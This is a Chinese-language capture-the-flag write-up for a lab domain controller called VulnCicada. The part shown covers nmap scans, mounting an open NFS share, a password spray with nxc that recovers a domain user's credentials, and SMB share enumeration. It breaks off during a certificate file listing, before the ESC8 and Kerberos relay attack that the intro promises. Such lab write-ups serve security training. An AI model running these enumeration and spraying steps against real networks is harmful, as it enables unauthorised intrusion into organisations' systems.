VulnCicada
VulnCicada是一个难度中等的靶机,通过NFS获取到有密码提示的图片和
C:\users目录下的用户列表,使用密码进行枚举,可以获取到入口用户rosie.powell的凭证,使用此凭据访问SMB,可以发现存在大量的证书文件,使用certipy进行检测发现存在ESC8漏洞,但由于DC与ADCS web存在台机器上,由于系统存在自中继防护,我无法将NTLM认证中继到同一台机器。于事使用Kerberos relay来进行绕过。我会向你展示如何分别在Linux利用SPN序列化 和windows上利用RemoteKrbRelay完成操作
1. User &System
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nmap 10.129.200.125 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-15 07:37 EST
Nmap scan report for 10.129.200.125 (10.129.200.125)
Host is up (0.17s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2049/tcp open nfs
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
9389/tcp open adws
49664/tcp open unknown
49668/tcp open unknown
52306/tcp open unknown
52372/tcp open unknown
52830/tcp open unknown
61688/tcp open unknown
61689/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 48.38 seconds
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nmap 10.129.200.125 -p53,80,88,111,135,139,389,445,464,593,636,2049,3268,3269,3389,9389,49664,49668,52306,52372,52830,61688,61689 -sCV -O -oA nmap/namp
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-15 07:40 EST
Nmap scan report for 10.129.200.125 (10.129.200.125)
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-15 12:40:29Z)
>>>> 111/tcp open rpcbind?
| rpcinfo:
| program version port/proto service
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp6 nfs
>>>> | 100003 4 2049/tcp nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2026-01-15T12:26:38
|_Not valid after: 2027-01-15T12:26:38
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2026-01-15T12:26:38
|_Not valid after: 2027-01-15T12:26:38
>>>> 2049/tcp open mountd 1-3 (RPC #100005)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2026-01-15T12:26:38
|_Not valid after: 2027-01-15T12:26:38
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2026-01-15T12:26:38
|_Not valid after: 2027-01-15T12:26:38
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-15T12:42:09+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Not valid before: 2026-01-14T12:34:14
|_Not valid after: 2026-07-16T12:34:14
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
52306/tcp open msrpc Microsoft Windows RPC
52372/tcp open msrpc Microsoft Windows RPC
52830/tcp open msrpc Microsoft Windows RPC
61688/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
61689/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC-JPQ225; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-01-15T12:41:31
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.53 seconds
1.2. NFS
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# showmount -e 10.129.200.125
Export list for 10.129.200.125:
/profiles (everyone)
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# mkdir nfs_share
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# mount -t nfs 10.129.200.125:/profiles ./nfs_share
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada/nfs_share]
└─# ls
Administrator Debra.Wright Jordan.Francis Katie.Ward Richard.Gibbons Shirley.West
Daniel.Marshall Jane.Carter Joyce.Andrews Megan.Simpson Rosie.Powell
这看着是一个C:\users
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada/nfs_share]
└─# tree ./
./
├── Administrator
│ ├── Documents
│ │ ├── $RECYCLE.BIN
│ │ │ └── desktop.ini
│ │ └── desktop.ini
>>>> │ └── vacation.png
├── Daniel.Marshall
├── Debra.Wright
├── Jane.Carter
├── Jordan.Francis
├── Joyce.Andrews
├── Katie.Ward
├── Megan.Simpson
├── Richard.Gibbons
├── Rosie.Powell
│ ├── Documents
│ │ ├── $RECYCLE.BIN
│ │ │ └── desktop.ini
│ │ └── desktop.ini
>>>> │ └── marketing.png
└── Shirley.West
16 directories, 6 files
这两个图片很可疑
发现一个密码Cicada123
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb 10.129.200.125 -u valid_users.txt -p pass.txt --continue-on-success -k
SMB 10.129.200.125 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Administrator:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Daniel.Marshall:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Debra.Wright:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Jane.Carter:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Jordan.Francis:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Joyce.Andrews:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Katie.Ward:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Megan.Simpson:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Richard.Gibbons:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Shirley.West:Cicada123 KDC_ERR_CLIENT_REVOKED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Administrator:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Daniel.Marshall:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Debra.Wright:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Jane.Carter:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Jordan.Francis:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Joyce.Andrews:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Katie.Ward:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Megan.Simpson:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Richard.Gibbons:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Shirley.West:cicada123 KDC_ERR_CLIENT_REVOKED
1.3. SMB
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb 10.129.200.125 -u rosie.powell -p Cicada123 --shares -k
SMB 10.129.200.125 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.200.125 445 DC-JPQ225 [+] cicada.vl\rosie.powell:Cicada123
SMB 10.129.200.125 445 DC-JPQ225 [*] Enumerated shares
SMB 10.129.200.125 445 DC-JPQ225 Share Permissions Remark
SMB 10.129.200.125 445 DC-JPQ225 ----- ----------- ------
SMB 10.129.200.125 445 DC-JPQ225 ADMIN$ Remote Admin
SMB 10.129.200.125 445 DC-JPQ225 C$ Default share
SMB 10.129.200.125 445 DC-JPQ225 CertEnroll READ Active Directory Certificate Services share
SMB 10.129.200.125 445 DC-JPQ225 IPC$ READ Remote IPC
SMB 10.129.200.125 445 DC-JPQ225 NETLOGON READ Logon server share
SMB 10.129.200.125 445 DC-JPQ225 profiles$ READ,WRITE
SMB 10.129.200.125 445 DC-JPQ225 SYSVOL READ Logon server share
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# impacket-smbclient -k DC-JPQ225.cicada.vl -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use CertEnroll
# ls
drw-rw-rw- 0 Thu Jan 15 07:40:28 2026 .
drw-rw-rw- 0 Fri Sep 13 11:17:59 2024 ..
-rw-rw-rw- 741 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(1)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(1).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(10)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(10).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(11)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(11).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(12)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(12).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(13)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(13).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(14)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(14).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(15)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(15).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(16)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(16).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(17)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(17).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(18)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(18).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(19)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(19).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(2)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(2).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(20)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(20).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(21)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(21).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(22)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(22).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(23)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(23).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(24)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(24).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(25)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(25).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(26)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(26).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(27)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(27).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(28)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(28).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(3)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(3).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(4)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(4).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(5)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(5).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(6)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(6).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(7)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(7).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(8)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(8).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(9)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(9).crl
-rw-rw-rw- 736 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA+.crl
-rw-rw-rw- 933 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA.crl
-rw-rw-rw- 1385 Sun Sep 15 09:18:43 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(0-1).crt
-rw-rw-rw- 924 Sun Sep 15 03:51:18 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(1).crt
-rw-rw-rw- 1390 Sun Sep 15 09:18:43 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(1-0).crt
-rw-rw-rw- 1390 Sun Sep 15 09:18:43 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(1-2).crt
-rw-rw-rw- 924 Thu Apr 10 04:44:43 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(10).crt
-rw-rw-rw- 1391 Fri Apr 11 01:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(10-11).crt
-rw-rw-rw- 1391 Thu Apr 10 04:57:00 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(10-9).crt
-rw-rw-rw- 924 Thu Apr 10 04:58:25 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(11).crt
-rw-rw-rw- 1391 Fri Apr 11 01:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(11-10).crt
-rw-rw-rw- 1391 Fri Apr 11 01:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(11-12).crt
-rw-rw-rw- 924 Thu Apr 10 05:00:22 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(12).crt
-rw-rw-rw- 1391 Fri Apr 11 01:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(12-11).crt
-rw-rw-rw- 1391 Fri Apr 11 01:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(12-13).crt
-rw-rw-rw- 924 Thu Apr 10 05:03:13 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(13).crt
-rw-rw-rw- 1391 Fri Apr 11 01:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(13-12).crt
-rw-rw-rw- 1391 Tue Jun 3 06:21:47 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(13-14).crt
-rw-rw-rw- 924 Fri Apr 11 01:49:41 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(14).crt
-rw-rw-rw- 1391 Tue Jun 3 06:22:11 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(14-13).crt
-rw-rw-rw- 1391 Tue Jun 3 06:22:11 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(14-15).crt
-rw-rw-rw- 924 Fri Apr 11 01:51:40 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(15).crt
-rw-rw-rw- 1391 Tue Jun 3 06:22:11 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(15-14).crt
-rw-rw-rw- 1391 Tue Jun 3 06:22:12 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(15-16).crt
-rw-rw-rw- 924 Fri Apr 11 01:53:40 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(16).crt
-rw-rw-rw- 1391 Tue Jun 3 06:22:12 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(16-15).crt
-rw-rw-rw- 1391 Wed Jun 4 08:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(16-17).crt
-rw-rw-rw- 924 Tue Jun 3 06:23:15 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(17).crt
-rw-rw-rw- 1391 Wed Jun 4 08:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(17-16).crt
-rw-rw-rw- 1391 Wed Jun 4 08:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(17-18).crt
-rw-rw-rw- 924 Tue Jun 3 06:24:51 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(18).crt
-rw-rw-rw- 1391 Wed Jun 4 08:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(18-17).crt
-rw-rw-rw- 1391 Wed Jun 4 08:51:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(18-19).crt
-rw-rw-rw- 924 Tue Jun 3 06:26:51 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(19).crt
-rw-rw-rw- 1391 Wed Jun 4 08:51:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(19-18).crt
-rw-rw-rw- 1391 Wed Jun 4 09:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(19-20).crt
-rw-rw-rw- 924 Sun Sep 15 03:53:03 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(2).crt
-rw-rw-rw- 1390 Sun Sep 15 09:18:44 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(2-1).crt
-rw-rw-rw- 1390 Sun Sep 29 05:41:29 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(2-3).crt
-rw-rw-rw- 924 Wed Jun 4 08:52:43 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(20).crt
-rw-rw-rw- 1391 Wed Jun 4 09:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(20-19).crt
-rw-rw-rw- 1391 Wed Jun 4 09:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(20-21).crt
-rw-rw-rw- 924 Wed Jun 4 08:54:47 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(21).crt
-rw-rw-rw- 1391 Wed Jun 4 09:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(21-20).crt
-rw-rw-rw- 1391 Wed Jun 4 09:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(21-22).crt
-rw-rw-rw- 924 Wed Jun 4 08:56:47 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(22).crt
-rw-rw-rw- 1391 Wed Jun 4 09:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(22-21).crt
-rw-rw-rw- 1391 Wed Jun 4 10:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(22-23).crt
-rw-rw-rw- 924 Wed Jun 4 09:36:17 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(23).crt
-rw-rw-rw- 1391 Wed Jun 4 10:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(23-22).crt
-rw-rw-rw- 1391 Wed Jun 4 10:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(23-24).crt
-rw-rw-rw- 924 Wed Jun 4 09:38:20 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(24).crt
-rw-rw-rw- 1391 Wed Jun 4 10:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(24-23).crt
-rw-rw-rw- 1391 Wed Jun 4 10:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(24-25).crt
-rw-rw-rw- 924 Wed Jun 4 09:40:21 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(25).crt
-rw-rw-rw- 1391 Wed Jun 4 10:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(25-24).crt
-rw-rw-rw- 1391 Thu Jan 15 07:35:08 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(25-26).crt
-rw-rw-rw- 924 Wed Jun 4 10:04:01 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(26).crt
-rw-rw-rw- 1391 Thu Jan 15 07:35:08 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(26-25).crt
-rw-rw-rw- 1391 Thu Jan 15 07:35:08 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(26-27).crt
-rw-rw-rw- 924 Wed Jun 4 10:05:56 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(27).crt
-rw-rw-rw- 1391 Thu Jan 15 07:35:08 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(27-26).crt
-rw-rw-rw- 1391 Thu Jan 15 07:35:08 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(27-28).crt
-rw-rw-rw- 924 Wed Jun 4 10:07:56 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(28).crt
-rw-rw-rw- 1391 Thu Jan 15 07:35:08 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(28-27).crt
-rw-rw-rw- 924 Thu Jan 15 07:36:27 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(29).crt
-rw-rw-rw- 924 Sun Sep 15 09:21:57 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(3).crt
-rw-rw-rw- 1390 Sun Sep 29 05:41:29 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(3-2).crt
-rw-rw-rw- 1390 Sun Sep 29 05:41:29 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(3-4).crt
-rw-rw-rw- 924 Thu Jan 15 07:38:27 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(30).crt
-rw-rw-rw- 924 Thu Jan 15 07:40:28 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(31).crt
-rw-rw-rw- 924 Sun Sep 15 09:24:12 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(4).crt
-rw-rw-rw- 1390 Sun Sep 29 05:41:30 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(4-3).crt
-rw-rw-rw- 1390 Thu Apr 10 04:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(4-5).crt
-rw-rw-rw- 924 Sun Sep 29 05:43:51 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(5).crt
-rw-rw-rw- 1390 Thu Apr 10 04:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(5-4).crt
-rw-rw-rw- 1390 Thu Apr 10 04:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(5-6).crt
-rw-rw-rw- 924 Sun Sep 29 05:44:59 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(6).crt
-rw-rw-rw- 1390 Thu Apr 10 04:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(6-5).crt
-rw-rw-rw- 1390 Thu Apr 10 04:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(6-7).crt
-rw-rw-rw- 924 Sun Sep 29 05:46:59 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(7).crt
-rw-rw-rw- 1390 Thu Apr 10 04:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(7-6).crt
-rw-rw-rw- 1390 Thu Apr 10 04:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(7-8).crt
-rw-rw-rw- 924 Thu Apr 10 04:40:45 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(8).crt
